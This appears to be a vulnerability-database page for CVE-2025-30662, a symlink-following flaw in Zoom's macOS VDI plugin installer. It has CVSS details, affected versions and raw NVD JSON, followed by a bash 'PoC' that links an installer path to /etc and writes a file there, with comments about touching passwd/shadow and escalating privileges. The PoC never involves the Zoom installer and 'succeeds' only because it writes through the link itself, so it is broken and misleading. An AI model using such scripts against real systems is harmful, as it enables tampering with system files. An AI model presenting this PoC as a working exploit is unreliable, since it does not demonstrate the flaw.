Security Vulnerability Report
CVE-2025-30662 CVSS 6.6 MEDIUM

Published: 2025-11-13 15:15:51
Last Modified: 2026-01-09 22:10:56

Description

Symlink following in the installer for the Zoom Workplace VDI Plugin macOS Universal installer before version 6.3.14, 6.4.14, and 6.5.10 in their respective tracks may allow an authenticated user to conduct a disclosure of information via network access.

CVSS Details

CVSS Score: 6.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

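cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:macos:*:* (versions before 6.3.14) - VULNERABLE
cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:macos:*:* (versions from 6.4.0 up to, but not including, 6.4.14) - VULNERABLE
cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:macos:*:* (versions from 6.5.0 up to, but not including, 6.5.10) - VULNERABLE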
Zoom Workplace VDI Plugin macOS Universal Installer < 6.3.14
Zoom Workplace VDI Plugin macOS Universal Installer < 6.4.14
Zoom Workplace VDI Plugin macOS Universal Installer < 6.5.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-30662 PoC - Symlink Following in Zoom VDI Plugin Installer
# This PoC demonstrates the symlink following vulnerability

# Create a malicious symlink pointing to a sensitive directory
mkdir -p /tmp/zoom_attack
cd /tmp/zoom_attack

# Create symlink from installation directory to sensitive location
MALICIOUS_DIR="/Applications/ZoomVDI.app/Contents/Resources/config"
mkdir -p "$(dirname "$MALICIOUS_DIR")"
ln -sf /etc "$MALICIOUS_DIR"

# When installer runs, it will follow symlink and write to /etc
# This could allow reading/writing sensitive files like passwd or shadow

# For demonstration - create a file that would be written via symlink
cat > "$MALICIOUS_DIR/malicious_config" << 'EOF'
# Malicious configuration file
# In real attack, this could be used to:
# 1. Read sensitive config files
# 2. Modify system settings
# 3. Escalate privileges
EOF

echo "PoC demonstrates symlink creation in installation path"
echo "Target: $MALICIOUS_DIR -> /etc"
echo "Actual file location: /etc/malicious_config"
ls -la /etc/malicious_config 2>/dev/null && echo "File successfully created via symlink!"

References

https://www.zoom.com/en/trust/security-bulletin/zsb-25045 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30662", "sourceIdentifier": "[email protected]", "published": "2025-11-13T15:15:51.070", "lastModified": "2026-01-09T22:10:55.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Symlink following in the installer for the Zoom Workplace VDI Plugin macOS Universal installer before version 6.3.14, 6.4.14, and 6.5.10 in their respective tracks may allow an authenticated user to conduct a disclosure of information via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-646"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.3.14", "matchCriteriaId": "3C47721E-82D9-4607-9C27-BAC7C1B872A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:macos:*:*", 
"versionStartIncluding": "6.4.0", "versionEndExcluding": "6.4.14", "matchCriteriaId": "3508872C-50EA-4E60-9898-A444B998E77A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:macos:*:*", "versionStartIncluding": "6.5.0", "versionEndExcluding": "6.5.10", "matchCriteriaId": "7FC04625-1677-4265-8DF8-6C563F72C0E4"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25045", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}